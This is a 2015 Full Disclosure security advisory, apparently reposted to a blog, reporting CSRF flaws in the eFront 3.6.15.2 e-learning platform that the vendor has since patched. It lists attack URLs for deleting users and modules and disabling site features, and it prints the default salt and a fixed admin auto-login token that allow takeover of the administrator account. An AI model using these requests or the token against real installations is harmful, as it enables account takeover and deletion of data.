[FD] Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)

Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE) Advisory ID: SROEADV-2015-09 Author: Steffen Rösemann Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014, build 18021) Vendor URL: http://ift.tt/XKxSOF Vendor Status: patched CVE-ID: - Tested with/on: -Browser: Firefox 35, Iceweasel 31.3.0 -OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2, MySQL) ========================== Vulnerability Description: ========================== The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021) suffers from multiple CSRF vulnerabilities. ================== Technical Details: ================== The vulnerabilities can be found in different modules that are all used in the administrator.php file: ctg=modules (delete and deactivate/activate modules): http:// {TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax ctg=users (delete and deactivate/activate users): http:// {TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax ctg=themes (activate/deactivate and delete themes): http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax ctg=digest (deactivate/activate and delete events, e.g. deactivate user registration, deactivate email for account activation) e.g. EVENT_ID 3 = user email activation e.g. EVENT_ID 4 = user registration http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1 ctg=languages (deactivate/activate and delete language settings) e.g. LANGUAGE_NAME = german http:// {TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax Exploit-Example (valid for all above listed vulnerabilities): The following CSRF-vulnerability can be abused to activate/deactivate the auto-login feature of an arbitrary user: http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax That makes it possible to login via a URL in an arbitrary user-account like in the following example without providing any login-credentials: http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN} eFront creates three standard user-accounts while the installation process. One of it is the administrators account. The components being used for creating the auto-login token are the following informations: - a salt - the accounts creation date - the username The salt isn't generated dynamically during the installation. On a common eFront installation without any changes by the administrator, it has the value cDWQR#$Rcxsc. The admin accounts creation date has the standard value 1365149958. As the standard administrators accountname is "admin", the auto-login token for the administrators account of eFront has always the value eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that none of the above mentioned values were changed after the installation. That makes it possible for an attacker to abuse the CSRF-vulnerability to gain access to the administrators account. ========= Solution: ========= Upgrade to eFront v. 3.6.15.3, build 18022. ==================== Disclosure Timeline: ==================== 14/15-Jan-2015 – found the vulnerability 15-Jan-2015 - informed the developers (see [3]) 15-Jan-2015 – release date of this security advisory [without technical details] 15-Jan-2015 - vendor responded, announces a patch 05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022) 05-Feb-2015 - release date of this security advisory 05-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://ift.tt/XKxSOF [2] http://ift.tt/1A3Y90l [3] http://ift.tt/1A3Y6Sj [4] http://ift.tt/1zK4BYE



Source: Gmail -> IFTTT-> Blogger